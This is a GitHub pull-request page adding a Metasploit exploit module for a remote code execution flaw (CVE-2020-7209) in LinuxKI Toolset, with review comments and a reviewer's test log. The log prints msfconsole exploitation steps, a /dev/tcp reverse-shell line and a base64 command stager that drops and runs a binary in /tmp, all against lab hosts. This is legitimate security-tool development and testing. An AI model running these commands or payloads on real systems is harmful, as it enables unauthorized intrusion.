Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add new module linuxki_rce - CVE-2020-7209 #13537

Merged
merged 13 commits into from
Jun 10, 2020
Merged

Add new module linuxki_rce - CVE-2020-7209 #13537

merged 13 commits into from
Jun 10, 2020

Conversation

numanturle
Copy link
Contributor

@numanturle numanturle commented May 29, 2020
edited
Loading

LinuxKI Toolset v6.0-1 and earlier is vulnerable to a remote code execution. The point where the security vulnerability is triggered is the kivis.php pid parameter.

Verification

  • Start msfconsole
  • use exploit/linux/http/linuxki_rce
  • show TARGETS
  • set TARGET <id>
  • set RHOST <target_ip>
  • set RPORT <target_port>
  • Ideally run check
  • set LHOST <your_ip>
  • set LPORT <your_port>
  • exploit

Scenarios

msf5 > use exploit/linux/http/linuxki_rce
msf5 exploit(linux/http/linuxki_rce) > set rhosts 10.0.0.1
rhosts => 10.0.0.1
msf5 exploit(linux/http/linuxki_rce) > set rport 8080
rport => 8080
msf5 exploit(linux/http/linuxki_rce) > check
[+] 10.0.0.1:8080 - The target is vulnerable.
msf5 exploit(linux/http/linuxki_rce) > set lhost 10.0.0.5
lhost => 10.0.0.5
msf5 exploit(linux/http/linuxki_rce) > run
[*] Started reverse TCP handler on 10.0.0.5:4444
[*] Sending exploit...
[*] Command shell session 1 opened (10.0.0.5:4444 -> 10.0.0.1:58914) at 2020-05-19 08:32:32 +0300
id
uid=48(apache) gid=48(apache) groups=48(apache)

@numanturle numanturle changed the title Add new module linuxki_rce Add new module linuxki_rce - CVE-2020-7209 May 29, 2020
h00die
h00die requested changes May 29, 2020
View reviewed changes
Copy link
Contributor

@h00die h00die left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Please run:

  1. rubocop -a on your ruby file
  2. tools/dev/msftidy.rb on your ruby file
  3. tools/dev/msftidy_docs.rb on your markdown file.

That will address many of the changes needed. I've added a few more items as well. Good first time contribution though!

modules/exploits/linux/http/linuxki_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/linuxki_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/linuxki_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/linuxki_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/linuxki_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/linuxki_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/linuxki_rce.rb Outdated Show resolved Hide resolved
documentation/modules/exploit/linux/http/linuxki_rce.md Outdated Show resolved Hide resolved
documentation/modules/exploit/linux/http/linuxki_rce.md Outdated Show resolved Hide resolved
documentation/modules/exploit/linux/http/linuxki_rce.md Outdated Show resolved Hide resolved
@bcoles bcoles added the module label May 29, 2020
@numanturle
fix missing module
dd5ed53 
CmdStager included
@numanturle numanturle requested a review from h00die May 30, 2020 08:09
numanturle
numanturle commented May 30, 2020
View reviewed changes
Copy link
Contributor Author

@numanturle numanturle left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

okey

@numanturle numanturle requested a review from bcoles June 1, 2020 19:47
@bcoles
Copy link
Contributor

bcoles commented Jun 3, 2020

Please add a Linux command stager target. Take a look at modules/exploits/unix/webapp/drupal_drupalgeddon2.rb for example targets.

@space-r7 space-r7 added the docs label Jun 3, 2020
@cdelafuente-r7 cdelafuente-r7 self-assigned this Jun 5, 2020
cdelafuente-r7
cdelafuente-r7 requested changes Jun 5, 2020
View reviewed changes
Copy link
Contributor

@cdelafuente-r7 cdelafuente-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@numanturle, thanks for this PR. This is a great first contribution! I just added a few comments for you to look at.

modules/exploits/linux/http/linuxki_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/linuxki_rce.rb Show resolved Hide resolved
modules/exploits/linux/http/linuxki_rce.rb Outdated Show resolved Hide resolved
@numanturle @cdelafuente-r7
Update modules/exploits/linux/http/linuxki_rce.rb
095b685 
Co-authored-by: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>
@cdelafuente-r7
Copy link
Contributor

@numanturle, these changes look good to me. Thanks!

Regarding your question (here), do you still plan to add default payload to each target and be automatically selected when the target changes? If not, I will go ahead and land it.

@cdelafuente-r7
Copy link
Contributor

@h00die, it looks like the changes you requested were made (still pending approval). Are we good to land?

h00die
h00die reviewed Jun 9, 2020
View reviewed changes
Copy link
Contributor

@h00die h00die left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

a few doc cleanup items. @cdelafuente-r7 you can prob make this changes when landing as theyre super minor.

documentation/modules/exploit/linux/http/linuxki_rce.md Outdated Show resolved Hide resolved
documentation/modules/exploit/linux/http/linuxki_rce.md Show resolved Hide resolved
documentation/modules/exploit/linux/http/linuxki_rce.md Outdated Show resolved Hide resolved
documentation/modules/exploit/linux/http/linuxki_rce.md Outdated Show resolved Hide resolved
@h00die
Copy link
Contributor

h00die commented Jun 9, 2020

other than those few doc changes I just added, i'm happy with it

@numanturle
Copy link
Contributor Author

@numanturle, these changes look good to me. Thanks!

Regarding your question (here), do you still plan to add default payload to each target and be automatically selected when the target changes? If not, I will go ahead and land it.

I added default payloads 👍

@cdelafuente-r7
Copy link
Contributor

I tested this exploit against LinuxKI Toolset v6.01 on x64 CentOS 7.8.2003 virtual machine, with httpd running in a docker container, as described in your module documentation. I successfully got a session with every Target. Also, I verified that the payload is setup automatically when the Target changes.

Example output 
-----------------------------------------------------------------------------------
The pg and/or activerecord gem version has changed, meaning deprecated pg constants
may no longer be in use, so try deleting this file to see if the
'The PGconn, PGresult, and PGError constants are deprecated...' message has gone:
/Users/cdelafuente/dev/src/metasploit-framework/lib/pg/deprecated_constants.rb
-----------------------------------------------------------------------------------


IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v5.0.92-dev-9e810cb345               ]
+ -- --=[ 2024 exploits - 1100 auxiliary - 343 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Use the resource command to run commands from a file

msf5 > use exploit/linux/http/linuxki_rce
msf5 exploit(linux/http/linuxki_rce) > set payload 0
msf5 exploit(linux/http/linuxki_rce) > options

Module options (exploit/linux/http/linuxki_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path to the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)


msf5 exploit(linux/http/linuxki_rce) > set RHOSTS 172.16.60.173
RHOSTS => 172.16.60.173
msf5 exploit(linux/http/linuxki_rce) > set RPORT 32777
RPORT => 32777
msf5 exploit(linux/http/linuxki_rce) > set LHOST 172.16.60.1
LHOST => 172.16.60.1
msf5 exploit(linux/http/linuxki_rce) > set verbose true
verbose => true
msf5 exploit(linux/http/linuxki_rce) > check
[+] 172.16.60.173:32777 - The target is vulnerable.
msf5 exploit(linux/http/linuxki_rce) > run

[*] Started reverse TCP handler on 172.16.60.1:4444
[*] Executing Automatic (PHP In-Memory) target
[*] Sending payload...
[*] Sending stage (38288 bytes) to 172.16.60.173
[*] Meterpreter session 1 opened (172.16.60.1:4444 -> 172.16.60.173:59092) at 2020-06-10 11:18:49 +0200

meterpreter > getuid
Server username:  (48)
meterpreter > sysinfo
Computer    : 1e562def69e5
OS          : Linux 1e562def69e5 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
Meterpreter : php/linux
meterpreter > [*] Shutting down Meterpreter...

[*] 172.16.60.173 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(linux/http/linuxki_rce) > set target 1
target => 1
msf5 exploit(linux/http/linuxki_rce) > options

Module options (exploit/linux/http/linuxki_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.16.60.173    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      32777            yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path to the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.60.1      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Automatic (PHP Dropper)


msf5 exploit(linux/http/linuxki_rce) > run

[*] Started reverse TCP handler on 172.16.60.1:4444
[*] Executing Automatic (PHP Dropper) target
[*] Sending payload...
[*] Sending stage (38288 bytes) to 172.16.60.173
[*] Meterpreter session 2 opened (172.16.60.1:4444 -> 172.16.60.173:59094) at 2020-06-10 11:19:46 +0200
[!] This exploit may require manual cleanup of '/tmp/dKuRXOy3A30DI7L5Leh.php' on the target

meterpreter > sysinfo
Computer    : 1e562def69e5
OS          : Linux 1e562def69e5 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
Meterpreter : php/linux
meterpreter > [*] Shutting down Meterpreter...

[*] 172.16.60.173 - Meterpreter session 2 closed.  Reason: User exit
msf5 exploit(linux/http/linuxki_rce) > set target 2
target => 2
msf5 exploit(linux/http/linuxki_rce) > options

Module options (exploit/linux/http/linuxki_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.16.60.173    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      32777            yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path to the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.60.1      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Automatic (Unix In-Memory)


msf5 exploit(linux/http/linuxki_rce) > run

[+] 0<&86-;exec 86<>/dev/tcp/172.16.60.1/4444;sh <&86 >&86 2>&86
[*] Started reverse TCP handler on 172.16.60.1:4444
[*] Executing Automatic (Unix In-Memory) target
[*] Sending payload...
[*] Command shell session 3 opened (172.16.60.1:4444 -> 172.16.60.173:59096) at 2020-06-10 11:21:01 +0200
id

uid=48(apache) gid=48(apache) groups=48(apache)
uname -a
Linux 1e562def69e5 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 172.16.60.173 - Command shell session 3 closed.
msf5 exploit(linux/http/linuxki_rce) > set target 3
target => 3
msf5 exploit(linux/http/linuxki_rce) > options

Module options (exploit/linux/http/linuxki_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.16.60.173    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      32777            yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path to the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.60.1      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   3   Automatic (Linux Dropper)


msf5 exploit(linux/http/linuxki_rce) > run

[*] Started reverse TCP handler on 172.16.60.1:4444
[*] Executing Automatic (Linux Dropper) target
[*] Sending payload...
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1torBA8AWgCABFcieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/TxcFJ.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/rnEuO' < '/tmp/TxcFJ.b64' ; chmod +x '/tmp/rnEuO' ; '/tmp/rnEuO' ; rm -f '/tmp/rnEuO' ; rm -f '/tmp/TxcFJ.b64'"]
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (980808 bytes) to 172.16.60.173
[*] Meterpreter session 4 opened (172.16.60.1:4444 -> 172.16.60.173:59098) at 2020-06-10 11:22:47 +0200
[*] Command Stager progress - 100.00% done (763/763 bytes)

meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : CentOS 7.8.2003 (Linux 3.10.0-1127.10.1.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > [*] Shutting down Meterpreter...

[*] 172.17.0.2 - Meterpreter session 4 closed.  Reason: User exit
msf5 exploit(linux/http/linuxki_rce) >

@cdelafuente-r7
Copy link
Contributor

@numanturle , thanks for this great contribution! I will go ahead and land it today.

@numanturle
Copy link
Contributor Author

@numanturle , thanks for this great contribution! I will go ahead and land it today.

i am learning new things enjoy it very much. ❤️

@cdelafuente-r7 cdelafuente-r7 merged commit 797673f into rapid7:master Jun 10, 2020
@cdelafuente-r7
Copy link
Contributor

cdelafuente-r7 commented Jun 10, 2020
edited by tperry-r7
Loading

Release Notes

The LinuxKI Toolset 6.01 Remote Command Execution exploits a RCE in LinuxKI Toolset v6.01 and earlier. This vulnerability is related to an improper input validation of an HTTP GET parameter. An attacker can leverage this to execute arbitrary commands in the context of the webserver. This vulnerability is identified as CVE-2020-7209.

@tperry-r7 tperry-r7 added the rn-modules release notes for new or majorly enhanced modules label Jun 25, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@h00die h00die h00die requested changes

@cdelafuente-r7 cdelafuente-r7 cdelafuente-r7 approved these changes

@bcoles bcoles Awaiting requested review from bcoles

Assignees

@cdelafuente-r7 cdelafuente-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
6 participants
@numanturle @bcoles @cdelafuente-r7 @h00die @space-r7 @tperry-r7